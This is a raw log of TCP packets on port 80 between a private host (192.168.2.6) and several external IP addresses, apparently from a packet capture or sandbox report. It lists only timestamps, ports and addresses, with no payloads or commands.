Jul 2, 2024 00:05:08.103072882 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103075981 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.103084087 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103087902 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.103094101 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103113890 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.103140116 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.103163958 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103174925 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103187084 CEST	80	49734	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:08.103198051 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.103200912 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.103209019 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.103219032 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.103230000 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.103239059 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.103240013 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.103250980 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.103261948 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.103271961 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.103282928 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.103286982 CEST	49734	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:08.103287935 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.103292942 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.103302956 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.103306055 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.103315115 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.103317976 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103328943 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103338957 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103343964 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.103348970 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103373051 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.103374004 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.103393078 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.103893995 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103904963 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103914022 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103924990 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103935957 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103936911 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.103945971 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103955984 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103960037 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.103965998 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103982925 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103982925 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.103993893 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.104003906 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.104007959 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.104013920 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.104015112 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.104023933 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.104034901 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.104041100 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.104044914 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.104053974 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.104055882 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.104065895 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.104077101 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.104082108 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.104085922 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.104089975 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.104098082 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104124069 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.104124069 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.104167938 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.104561090 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104573011 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104582071 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104593039 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104604006 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104609013 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104612112 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.104612112 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.104619980 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104630947 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104643106 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104648113 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.104660988 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104666948 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.104684114 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104686975 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.104697943 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104707956 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104717970 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104723930 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.104723930 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.104731083 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104742050 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104751110 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104758024 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.104763031 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104779959 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104787111 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.104787111 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.104789972 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104800940 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104811907 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104823112 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104832888 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104840994 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.104841948 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.104842901 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104855061 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104865074 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104867935 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.104876995 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104887962 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104897976 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.104903936 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.104933023 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.104933023 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.105549097 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.105560064 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.105570078 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.105581999 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.105591059 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.105607986 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.105618000 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.105626106 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.105628967 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.105639935 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.105650902 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.105650902 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.105650902 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.105660915 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.105671883 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.105680943 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.105685949 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.105685949 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.105693102 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.105705023 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.105715990 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.105721951 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.105726004 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.105736017 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.105746031 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.105751991 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.105756998 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.105765104 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.105793953 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.106085062 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.106096983 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.106106043 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.106116056 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.106126070 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.106137037 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.106137991 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.106137991 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.106149912 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.106168032 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.106172085 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.106178999 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.106189966 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.106199980 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.106210947 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.106218100 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.106218100 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.106220961 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.106230974 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.106240988 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.106245041 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.106251001 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.106261969 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.106261969 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.106273890 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.106297970 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.106297970 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.106307983 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.106338024 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.106348991 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.106359959 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.106375933 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.106385946 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.106394053 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.106395960 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.106398106 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.106409073 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.106419086 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.106421947 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.106431007 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.106441021 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.106441021 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.106455088 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.106463909 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.106470108 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.106470108 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.106475115 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.106487989 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.106498003 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.106508017 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.106509924 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.106519938 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.106530905 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.106540918 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.106547117 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.106547117 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.106551886 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.106580973 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.106580973 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.106622934 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.107012033 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107023954 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107033968 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107043982 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107058048 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.107059002 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107072115 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107085943 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107089043 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.107098103 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107109070 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107112885 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.107121944 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107132912 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107141972 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107150078 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.107150078 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.107181072 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.107181072 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.107263088 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107274055 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107283115 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107292891 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107302904 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107311964 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107314110 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.107314110 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.107323885 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107364893 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.107364893 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.107394934 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107405901 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107415915 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107425928 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107435942 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.107435942 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107449055 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107459068 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107460022 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.107470036 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107480049 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107482910 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.107491016 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107501030 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107503891 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.107537985 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.107569933 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107573032 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.107582092 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107593060 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.107608080 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.107608080 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.107618093 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.107629061 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.107636929 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.107639074 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.107649088 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.107659101 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.107666016 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.107670069 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.107681036 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.107691050 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.107692957 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.107701063 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.107711077 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.107719898 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.107728958 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.107728958 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.107729912 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.107739925 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.107748985 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.107749939 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.107758999 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.107760906 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.107768059 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.107796907 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.107796907 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.107824087 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.108292103 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108303070 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108313084 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108323097 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108331919 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108342886 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108351946 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108357906 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.108357906 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.108362913 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108371973 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108382940 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108392954 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108402967 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.108403921 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.108403921 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.108412981 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.108437061 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.108448029 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.108458996 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.108623981 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.108634949 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.108644009 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.108654022 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.108663082 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.108670950 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.108670950 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.108673096 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.108684063 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.108694077 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.108694077 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108705044 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108715057 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108725071 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108738899 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.108741999 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108745098 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.108755112 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108760118 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.108764887 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108773947 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108782053 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.108784914 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108794928 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108803988 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108814001 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108823061 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108829021 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.108829021 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.108833075 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108844042 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108854055 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108864069 CEST	80	49716	77.105.133.27	192.168.2.6
